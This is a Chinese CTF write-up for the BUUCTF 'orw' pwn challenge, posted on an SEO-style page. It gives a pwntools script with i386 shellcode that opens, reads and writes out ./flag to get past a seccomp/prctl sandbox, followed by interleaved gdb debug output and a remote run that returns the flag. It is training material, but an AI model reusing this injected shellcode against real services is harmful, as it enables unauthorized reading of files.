当前位置： 首页 > news >正文

wordpress文章归档页面,郑州网络seo公司,成功的微网站,wordpress网页设计1.题目信息 BUUCTF在线评测 下载orw时防病毒要关闭 2.题目分析
orw是open、read、write的简写。有时候binary会通过prctl、seccomp进行沙箱保护#xff0c;并不能getshell。只能通过orw的方式拿到flag。 fdopen#xff08;‘./flag’); # 打开flag文件#xff0c;得到fd…1.题目信息 BUUCTF在线评测 下载orw时防病毒要关闭 2.题目分析  orw是open、read、write的简写。有时候binary会通过prctl、seccomp进行沙箱保护并不能getshell。只能通过orw的方式拿到flag。 fdopen‘./flag’); # 打开flag文件得到fd readfdbuf0x30); #通过fd将flag的内容读到内存中 write1buf0x30); #将内存中的flag内容输出到屏幕 在相关目录里面写入以下内容 holyeyesubuntu:/Re/6$ echo flag{testtest} ./flag holyeyesubuntu:/Re/6$    3.解题脚本 rootpwn_test1604:/ctf/work/6# ls orw orw.i64 orw.py rootpwn_test1604:/ctf/work/6# python Python 2.7.12 (default, Nov 12 2018, 14:36:49) [GCC 5.4.0 20160609] on linux2 Type help, copyright, credits or license for more information../flag.encode(hex) 2e2f666c6167./flag\x00\x00.encode(hex) 2e2f666c616700003.1只用修改的内容  context.archi386DEBUG 1LOCAL True BIN ./orw HOST node5.buuoj.cn PORT 25178def exploit(p):p.recv()pl xor eax, eaxxor ebx, ebxxor ecx, ecxxor edx, edxpush 0x00006761push 0x6c662f2emov eax, 5 #open(./flag)mov ebx, espmov ecx, 0mov edx, 0int 0x80mov ebx, eaxmov eax, 3 #read(fd,esp,0x30)mov ecx, espmov edx, 0x30int 0x80mov eax, 4 #write(1,esp,0x30)mov ebx, 1mov ecx, espmov edx, 0x30int 0x80p.sendline(asm(pl))p.interactive()return 3.2全部脚本  #!/usr/bin/env python

-- coding: utf-8 --from pickle import TRUE

from pwn import * import syscontext.terminal[tmux,sp,-h] context.log_leveldebug context.archi386DEBUG 1LOCAL True BIN ./orw HOST node5.buuoj.cn PORT 25178def get_base_address(proc):return int(open(/proc/{}/maps.format(proc.pid), rb).readlines()[0].split(-)[0], 16)def debug(bps,_s):script handle SIGALRM ignore\nPIE get_base_address(p)script set $_base 0x{:x}\n.format(PIE)for bp in bps:script b *0x%x\n%(PIEbp)script _sgdb.attach(p,gdbscriptscript)# pwn,caidan,leak,libc

recv recvuntil send sendline sendlineafter sendafter

#aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabdef exploit(p):p.recv()pl xor eax, eaxxor ebx, ebxxor ecx, ecxxor edx, edxpush 0x00006761push 0x6c662f2emov eax, 5 #open(./flag)mov ebx, espmov ecx, 0mov edx, 0int 0x80mov ebx, eaxmov eax, 3 #read(fd,esp,0x30)mov ecx, espmov edx, 0x30int 0x80mov eax, 4 #write(1,esp,0x30)mov ebx, 1mov ecx, espmov edx, 0x30int 0x80p.sendline(asm(pl))p.interactive()returnif name main:elf ELF(BIN)if len(sys.argv) 1:LOCAL Falsep remote(HOST, PORT)exploit(p)else:LOCAL Truep process(BIN)log.info(PID: str(proc.pidof(p)[0]))# pauseif DEBUG:debug([],)exploit(p) 3.3 运行本地 rootpwn_test1604:/ctf/work/6# tmux rootpwn_test1604:/ctf/work/6# python orw.py  rootpwn_test1604:/ctf/work/6# python orw.py [²⁵⁄₂₅]│ f 1 f765ab23 __read_nocancel25 [0/48] [DEBUG] PLT 0x8048370 read │ f 2 8048582 main58 [DEBUG] PLT 0x8048370 read │ f 3 f759d637 __libc_start_main247 [DEBUG] PLT 0x8048380 printf │pwndbg c [DEBUG] PLT 0x8048390 __stack_chk_fail │Continuing. [DEBUG] PLT 0x80483a0 __libc_start_main │ [DEBUG] PLT 0x80483b0 prctl │Program received signal SIGSEGV, Segmentation fault. [DEBUG] PLT 0x80483c0 gmon_start │0x0804a0a8 in shellcode () [] /ctf/work/6/orw │LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATAArch: i386-32-little │──────────────────────────────────────[ REGISTERS ]───────────────────────────────────────RELRO: Partial RELRO │ EAX 0x30Stack: Canary found │ EBX 0x1NX: NX disabled │ ECX 0xffbd74b4 ◂— 0x67616c66 (flag)PIE: No PIE (0x8048000) │ EDX 0x30RWX: Has RWX segments │ EDI 0xf7737000 (_GLOBAL_OFFSETTABLE) ◂— mov al, 0x1d / 0x1b1db0 / [] Starting local process ./orw: pid 179 │ ESI 0xf7737000 (_GLOBAL_OFFSETTABLE) ◂— mov al, 0x1d / 0x1b1db0 / [] PID: 179 │ EBP 0xffbd74c8 ◂— 0x0 [DEBUG] Wrote gdb script to /tmp/pwn1jT2Ys.gdb │ ESP 0xffbd74b4 ◂— 0x67616c66 (flag)file ./orw │ EIP 0x804a0a8 (shellcode72) ◂— 0xa /* \n /handle SIGALRM ignore │────────────────────────────────────────[ DISASM ]────────────────────────────────────────set $_base 0x8048000 │ ► 0x804a0a8 shellcode72 or al, byte ptr [eax] [] running in new terminal: /usr/bin/gdb -q ./orw 179 -x /tmp/pwn1jT2Ys.gdb │ 0x804a0aa shellcode74 add byte ptr [eax], al [DEBUG] Launching a new terminal: [/usr/bin/tmux, sp, -h, /usr/bin/gdb -q ./orw 1│ 0x804a0ac shellcode76 add byte ptr [eax], al 79 -x /tmp/pwn1jT2Ys.gdb] │ 0x804a0ae shellcode78 add byte ptr [eax], al [] Waiting for debugger: Done [DEBUG] Received 0x17 bytes: [0/25]│ f 1 f765ab23 __read_nocancel25 [0/48]Give my your shellcode: │ f 2 8048582 main58 [DEBUG] cpp -C -nostdinc -undef -P -I/usr/local/lib/python2.7/dist-packages/pwnlib/data/inc│ f 3 f759d637 __libc_start_main247 ludes /dev/stdin │pwndbg c [DEBUG] Assembling │Continuing..section .shellcode,awx │.global _start │Program received signal SIGSEGV, Segmentation fault..global start │0x0804a0a8 in shellcode ()_start: │LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATAstart: │──────────────────────────────────────[ REGISTERS ]───────────────────────────────────────.intel_syntax noprefix │ EAX 0x30xor eax, eax │ EBX 0x1xor ebx, ebx │ ECX 0xffbd74b4 ◂— 0x67616c66 (flag)xor ecx, ecx │ EDX 0x30xor edx, edx │ EDI 0xf7737000 (_GLOBAL_OFFSETTABLE) ◂— mov al, 0x1d /* 0x1b1db0 /push 0x00006761 │ ESI 0xf7737000 (_GLOBAL_OFFSETTABLE) ◂— mov al, 0x1d / 0x1b1db0 /push 0x6c662f2e │ EBP 0xffbd74c8 ◂— 0x0mov eax, 5 #open(./flag) │ ESP 0xffbd74b4 ◂— 0x67616c66 (flag)mov ebx, esp │ EIP 0x804a0a8 (shellcode72) ◂— 0xa / \n /mov ecx, 0 │────────────────────────────────────────[ DISASM ]────────────────────────────────────────mov edx, 0 │ ► 0x804a0a8 shellcode72 or al, byte ptr [eax]int 0x80 │ 0x804a0aa shellcode74 add byte ptr [eax], almov ebx, eax │ 0x804a0ac shellcode76 add byte ptr [eax], almov eax, 3 #read(fd,esp,0x30) │ 0x804a0ae shellcode78 add byte ptr [eax], almov ecx, esp │ 0x804a0b0 shellcode80 add byte ptr [eax], almov edx, 0x30 │ 0x804a0b2 shellcode82 add byte ptr [eax], alint 0x80 │ 0x804a0b4 shellcode84 add byte ptr [eax], almov eax, 4 #write(1,esp,0x30) │ 0x804a0b6 shellcode86 add byte ptr [eax], almov ebx, 1 │ 0x804a0b8 shellcode88 add byte ptr [eax], almov ecx, esp │ 0x804a0ba shellcode90 add byte ptr [eax], almov edx, 0x30 │ 0x804a0bc shellcode92 add byte ptr [eax], alint 0x80 │────────────────────────────────────────[ STACK ]───────────────────────────────────────── [DEBUG] /usr/bin/x86_64-linux-gnu-as -32 -o /tmp/pwn-asm-bw_t9d/step2 /tmp/pwn-asm-bw_t9d/s│00:0000│ ecx esp 0xffbd74b4 ◂— 0x67616c66 (flag) tep1 │01:0004│ 0xffbd74b8 ◂— 0x7365747b ({tes) [DEBUG] /usr/bin/x86_64-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-bw_t9d/step3 │02:0008│ 0xffbd74bc ◂— 0x73657474 (ttes) /tmp/pwn-asm-bw_t9d/step4 │03:000c│ 0xffbd74c0 ◂— 0xf70a7d74 [DEBUG] Sent 0x49 bytes: │04:0010│ 0xffbd74c4 —▸ 0xffbd74e0 ◂— 0x100000000 31 c0 31 db 31 c9 31 d2 68 61 67 00 00 68 2e 2f │1·1·│1·1·│hag·│·h./│ │05:0014│ ebp 0xffbd74c8 ◂— 0x000000010 66 6c b8 05 00 00 00 89 e3 b9 00 00 00 00 ba 00 │fl··│····│····│····│ │06:0018│ 0xffbd74cc —▸ 0xf759d637 (__libc_start_main247) ◂— add esp, 0x1000000020 00 00 00 cd 80 89 c3 b8 03 00 00 00 89 e1 ba 30 │····│····│····│···0│ │07:001c│ 0xffbd74d0 —▸ 0xf7737000 (_GLOBAL_OFFSETTABLE) ◂— mov al, 0x1d / 000000030 00 00 00 cd 80 b8 04 00 00 00 bb 01 00 00 00 89 │····│····│····│····│ │x1b1db0 /00000040 e1 ba 30 00 00 00 cd 80 0a │··0·│····│·│ │──────────────────────────────────────[ BACKTRACE ]─────────────────────────────────────── 00000049 │ ► f 0 804a0a8 shellcode72 [] Switching to interactive mode │ f 1 67616c66 [DEBUG] Received 0x30 bytes: │ f 2 7365747b00000000 66 6c 61 67 7b 74 65 73 74 74 65 73 74 7d 0a f7 │flag│{tes│ttes│t}··│ │ f 3 7365747400000010 e0 74 bd ff 00 00 00 00 37 d6 59 f7 00 70 73 f7 │·t··│····│7·Y·│·ps·│ │ f 4 f70a7d7400000020 00 70 73 f7 00 00 00 00 37 d6 59 f7 01 00 00 00 │·ps·│····│7·Y·│····│ │ f 5 ffbd74e000000030 │ f 6 f759d637 __libc_start_main247 flag{testtest} │Program received signal SIGSEGV (fault address 0x30) \xff\x00\x00\x00\x007psps\x007\x00\( 3.4 运行远程 rootpwn_test1604:/ctf/work/6# python orw.py 1 rootpwn_test1604:/ctf/work/6# tmux [exited] rootpwn_test1604:/ctf/work/6# python orw.py 1 [DEBUG] PLT 0x8048370 read [DEBUG] PLT 0x8048380 printf [DEBUG] PLT 0x8048390 __stack_chk_fail [DEBUG] PLT 0x80483a0 __libc_start_main [DEBUG] PLT 0x80483b0 prctl [DEBUG] PLT 0x80483c0 __gmon_start__ [*] /ctf/work/6/orwArch: i386-32-littleRELRO: Partial RELROStack: Canary foundNX: NX disabledPIE: No PIE (0x8048000)RWX: Has RWX segments [] Opening connection to node5.buuoj.cn on port 25178: Done [DEBUG] Received 0x17 bytes:Give my your shellcode: [DEBUG] cpp -C -nostdinc -undef -P -I/usr/local/lib/python2.7/dist-packages/pwnlib/data/includes /dev/stdin [DEBUG] Assembling.section .shellcode,awx.global _start.global __start_start:__start:.intel_syntax noprefixxor eax, eaxxor ebx, ebxxor ecx, ecxxor edx, edxpush 0x00006761push 0x6c662f2emov eax, 5 #open(./flag)mov ebx, espmov ecx, 0mov edx, 0int 0x80mov ebx, eaxmov eax, 3 #read(fd,esp,0x30)mov ecx, espmov edx, 0x30int 0x80mov eax, 4 #write(1,esp,0x30)mov ebx, 1mov ecx, espmov edx, 0x30int 0x80 [DEBUG] /usr/bin/x86_64-linux-gnu-as -32 -o /tmp/pwn-asm-C0CcaA/step2 /tmp/pwn-asm-C0CcaA/step1 [DEBUG] /usr/bin/x86_64-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-C0CcaA/step3 /tmp/pwn-asm-C0CcaA/step4 [DEBUG] Sent 0x49 bytes:00000000 31 c0 31 db 31 c9 31 d2 68 61 67 00 00 68 2e 2f │1·1·│1·1·│hag·│·h./│00000010 66 6c b8 05 00 00 00 89 e3 b9 00 00 00 00 ba 00 │fl··│····│····│····│00000020 00 00 00 cd 80 89 c3 b8 03 00 00 00 89 e1 ba 30 │····│····│····│···0│00000030 00 00 00 cd 80 b8 04 00 00 00 bb 01 00 00 00 89 │····│····│····│····│00000040 e1 ba 30 00 00 00 cd 80 0a │··0·│····│·│00000049 [*] Switching to interactive mode [DEBUG] Received 0x30 bytes:00000000 66 6c 61 67 7b 31 30 33 37 66 34 39 62 2d 33 30 │flag│{103│7f49│b-30│00000010 36 63 2d 34 30 34 32 2d 38 34 31 31 2d 34 38 34 │6c-4│042-│8411│-484│00000020 39 32 64 61 35 37 30 36 62 7d 0a f7 01 00 00 00 │92da│5706│b}··│····│00000030 flag{1037f49b-306c-4042-8411-48492da5706b} \x0[DEBUG] Received 0x2b bytes:timeout: the monitored command dumped core\n timeout: the monitored command dumped core [*] Got EOF while reading in interactive \) 3.5 避坑提醒 用kali2023的虚机环境不行要用ubuntu16.04的虚机环境就可以。